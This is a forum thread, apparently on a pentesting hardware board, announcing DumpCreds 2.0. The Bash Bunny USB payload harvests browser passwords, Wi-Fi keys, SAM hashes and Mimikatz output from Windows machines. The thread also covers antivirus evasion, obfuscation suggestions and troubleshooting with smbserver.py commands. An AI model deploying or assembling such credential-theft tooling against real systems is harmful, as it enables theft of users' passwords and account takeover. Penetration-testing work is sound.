qdba Posted March 30, 2017 Share Posted March 30, 2017 (edited) DumpCreds 2.0 Author: QDBA Version: Version 2.0.2 Target: Windows Description Dumps the usernames & plaintext passwords from Browsers (Crome, IE, FireFox) Wifi SAM Hashes Mimimk@tz Dump [new] Computerinformition ( Hardware, Softwarelist, Hotfixes, ProuctKey, Users...) without Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) Internet connection (becaus Firewall ContentFilter Blocks the download sites) Configuration None needed. Requirements Impacket must be installed. Install it from tools_installer payload https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer STATUS LED ----------------------- Status -------------------------------------------------------------- White Give drivers some time for installation Red Blink Fast Impacket not found Red Blink Slow Target did not acquire IP address Amber Blink Fast Initialization Amber HID Stage Purple Blink Fast Wait for IP coming up Purple Blink Slow Wait for Handshake (SMBServer Coming up) Purple / Amber Powershell scripts running RED Error in Powershell Scripts Green Finished Download https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0 ToDo paralellize Creds gathering with PS while Bashbunny is waiting for Target finished the script it can do some other nice work. i.e. nmap the target. (Not very usefull at the moment, because I'm Admin on Target Host) remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) Not Possible at the moment put some version information into the sourcecode and the output file rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain Credits to...... https://github.com/sekirkity/BrowserGather Get-ChromeCreds.ps1https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1 Edited April 5, 2017 by qdba 2 Quote Link to comment Share on other sites More sharing options...
LowValueTarget Posted March 30, 2017 Share Posted March 30, 2017 How does this work when faced with Anti-Virus? What about encoding/obfuscating the powershell with unicorn?https://github.com/trustedsec/unicorn Quote Link to comment Share on other sites More sharing options...
qdba Posted March 30, 2017 Author Share Posted March 30, 2017 @LowValueTarget At the moment MS Defender and Avira Antivir don't detect it. But I'm sure in 1 or 2 days they will :- Feel free to obfuscate the code if you want. I won't publish some encoded or obfuscated code here in this forum. If I do so, I'm sure some Anti-Virus Tools will detect it in 1 or 2 days. Quote Link to comment Share on other sites More sharing options...
LowValueTarget Posted March 30, 2017 Share Posted March 30, 2017 (edited) 7 minutes ago, qdba said: @LowValueTarget At the moment MS Defender and Avira Antivir don't detect it. But I'm sure in 1 or 2 days they will :- Feel free to obfuscate the code if you want. I won't publish some encoded or obfuscated code here in this forum. If I do so, I'm sure some Anti-Virus Tools will detect it in 1 or 2 days. Fair enough. Good payload. Edited March 30, 2017 by LowValueTarget Quote Link to comment Share on other sites More sharing options...
Mr.Pupp3T Posted March 30, 2017 Share Posted March 30, 2017 So its blinking red really fast on my secondary Laptop - WINDOWS 7 - What does that mean really? Red Blink Fast Impacket not found Like what does impacket not found? Quote Link to comment Share on other sites More sharing options...
illwill Posted March 31, 2017 Share Posted March 31, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote Link to comment Share on other sites More sharing options...
Mr.Pupp3T Posted March 31, 2017 Share Posted March 31, 2017 nvm i got it! :D wrong switch haha Quote Link to comment Share on other sites More sharing options...
illwill Posted March 31, 2017 Share Posted March 31, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote Link to comment Share on other sites More sharing options...
illwill Posted March 31, 2017 Share Posted March 31, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote Link to comment Share on other sites More sharing options...
jafahulo Posted March 31, 2017 Share Posted March 31, 2017 I haven't taken a dive into the code yet, but while testing this on windows 10 my bunny is getting caught up on waiting for the handshake (slow purple flashes). do you know why this could be? I uninstalled the drivers that had been on my computer for the NDIS network adapter mode that way it could have a fresh start, as though I was plugging this into a new machine, but still no cigar. any suggestions? Quote Link to comment Share on other sites More sharing options...
qdba Posted March 31, 2017 Author Share Posted March 31, 2017 1 hour ago, jafahulo said: I haven't taken a dive into the code yet, but while testing this on windows 10 my bunny is getting caught up on waiting for the handshake (slow purple flashes). do you know why this could be? I uninstalled the drivers that had been on my computer for the NDIS network adapter mode that way it could have a fresh start, as though I was plugging this into a new machine, but still no cigar. any suggestions? While Purple blinking Slow , coud you reach \\172.16.64.1\e with windows explorer? Quote Link to comment Share on other sites More sharing options...
jafahulo Posted March 31, 2017 Share Posted March 31, 2017 4 minutes ago, qdba said: While Purple blinking Slow , coud you reach \\172.16.64.1\e with windows explorer? I just tested, and no I wasn't able to. Quote Link to comment Share on other sites More sharing options...
qdba Posted March 31, 2017 Author Share Posted March 31, 2017 33 minutes ago, jafahulo said: I just tested, and no I wasn't able to. Could you check that File and printer sharing is enabled in your Firewall. Quote Link to comment Share on other sites More sharing options...
qdba Posted March 31, 2017 Author Share Posted March 31, 2017 My ideas coming with next Version..... paralellize Creds gathering with PS while Bashbunny is waiting for Target finishing the scripts it can do some other nice work. i.e. nmap the target. (any other ideas) remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) put some version information into the sourcecode and the output file rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Maybe! If Target is in a AD Domain and Mimik@tz give us some Domain Passwords try to get some more information about the AD Domain Quote Link to comment Share on other sites More sharing options...
jafahulo Posted March 31, 2017 Share Posted March 31, 2017 6 hours ago, qdba said: Could you check that File and printer sharing is enabled in your Firewall. Yes, File and printer sharing is enabled. I dug into it, and the bash bunny is actively refusing the connections. I connect my bunny to the computer, it gui r into run and runs the powershell script which in turn runs the command line which waits until the bunny's ip is on the network. Once it is, the bash bunny flashes purple slowly, and the command window goes away, and nothing happens. it literally can't put the file on the bunny to tell it to continue working. I'm thinking this is because my bunny is configured incorrectly outside of your code. Could this be the case? I haven't ssh'd or serial'd into it and changed anything yet. Is that a prerequisite that was assumed to be done? Quote Link to comment Share on other sites More sharing options...
qdba Posted March 31, 2017 Author Share Posted March 31, 2017 32 minutes ago, jafahulo said: Yes, File and printer sharing is enabled. I dug into it, and the bash bunny is actively refusing the connections. I connect my bunny to the computer, it gui r into run and runs the powershell script which in turn runs the command line which waits until the bunny's ip is on the network. Once it is, the bash bunny flashes purple slowly, and the command window goes away, and nothing happens. it literally can't put the file on the bunny to tell it to continue working. I'm thinking this is because my bunny is configured incorrectly outside of your code. Could this be the case? I haven't ssh'd or serial'd into it and changed anything yet. Is that a prerequisite that was assumed to be done? - Can you ping 172.16.64.1 - Try the attached payload.txt. If it goes to red, smbserver.py is missing. If not, ssh to bunny while purple LED blinks slow. 1. enter command at Terminal ps -ef | grep smb As result there should be a line like root 741 1 3 01:00 ? 00:00:27 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch1 2. enter command at Terminal mount |grep udisk As result there should be a line like /dev/nandf on /root/udisk type vfat (rw,relatime,fmask=0022,dmask=0022,codepage=cp437,iocharset=ascii,shortname=mixed,errors=continue) WIll the second powershell command fired up successfully - check cmd Window (I switched it to B&W in the payload) Have you tried it at second Computer payload.txt 1 Quote Link to comment Share on other sites More sharing options...
Blix Posted March 31, 2017 Share Posted March 31, 2017 Fellas, For those of you who pass all tests above and have the SMB server running, check that you have actually downloaded all the powerscripts that the payload refers to from bashbunny-payloads/payloads/DumpCreds_2.0/PS/ . I know some people who forgot to do that...... /Blix Quote Link to comment Share on other sites More sharing options...
jafahulo Posted March 31, 2017 Share Posted March 31, 2017 3 hours ago, qdba said: - Can you ping 172.16.64.1 - Try the attached payload.txt. If it goes to red, smbserver.py is missing. If not, ssh to bunny while purple LED blinks slow. 1. enter command at Terminal ps -ef | grep smb As result there should be a line like root 741 1 3 01:00 ? 00:00:27 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch1 2. enter command at Terminal mount |grep udisk As result there should be a line like /dev/nandf on /root/udisk type vfat (rw,relatime,fmask=0022,dmask=0022,codepage=cp437,iocharset=ascii,shortname=mixed,errors=continue) WIll the second powershell command fired up successfully - check cmd Window (I switched it to B&W in the payload) Have you tried it at second Computer payload.txt Alright, so I actually fixed it, but I'll let you know what was happening upto the point where I fixed it so you can refrence it if you ever need to. I could ping it, and the light did not turn red. I ssh'd into it and ran : ps -ef | grep smb I didn't get any smb servers running. The partition did mount to udisk correctly, and at that point, the command was not opening the second powershell terminal correctly. (I further modified the payload you sent me to make the cmd window stay open after it ran). What I did to fix it was to play around with how the smbserver got called. What worked for me was to have it called like this: python /pentest/impacket/examples/smbserver.py e $SWITCHDIR & small change, but huge difference. XD Thanks for all the help, and your payload is awesome! I love it! Quote Link to comment Share on other sites More sharing options...
qdba Posted April 1, 2017 Author Share Posted April 1, 2017 15 hours ago, jafahulo said: python /pentest/impacket/examples/smbserver.py e $SWITCHDIR & Yes thats the original call of smbserver command. The "nohup python /pentest/impacket/......." was only for debugging in your case. There are some timing problems in an older payload. I fixed in a later version. Guess you have an old one . sorry about it. But anyway fine that you like the payload. 1 Quote Link to comment Share on other sites More sharing options...
qdba Posted April 1, 2017 Author Share Posted April 1, 2017 New Version 2.0.1 Added: Gather Computerinformation (Hardware, Software, Hotfixes, OS Informatio, OS ProductKey, Userlist...) https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0 Quote Link to comment Share on other sites More sharing options...
Decoy Posted April 1, 2017 Share Posted April 1, 2017 6 hours ago, qdba said: New Version 2.0.1 Added: Gather Computerinformation (Hardware, Software, Hotfixes, OS Informatio, OS ProductKey, Userlist...) https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0 I think you might need to update the main GitHub link on your original post. Quote Link to comment Share on other sites More sharing options...
jafahulo Posted April 1, 2017 Share Posted April 1, 2017 7 hours ago, qdba said: Yes thats the original call of smbserver command. The "nohup python /pentest/impacket/......." was only for debugging in your case. There are some timing problems in an older payload. I fixed in a later version. Guess you have an old one . sorry about it. But anyway fine that you like the payload. ahh, in that case, my bad! But thank you for taking the time to help me out with it! Quote Link to comment Share on other sites More sharing options...
Bijleveldje Posted April 1, 2017 Share Posted April 1, 2017 Damn this is a nice payload, can't wait on this: On 31-3-2017 at 9:04 AM, qdba said: rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Good job, keep up the good work Quote Link to comment Share on other sites More sharing options...
qdba Posted April 1, 2017 Author Share Posted April 1, 2017 3 hours ago, Decoy said: I think you might need to update the main GitHub link on your original post. Thanks..... Done..... Quote Link to comment Share on other sites More sharing options...
Decoy Posted April 1, 2017 Share Posted April 1, 2017 4 minutes ago, qdba said: Thanks..... Done..... No worries. I wanted to make sure people could find it. That is an excellent payload. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.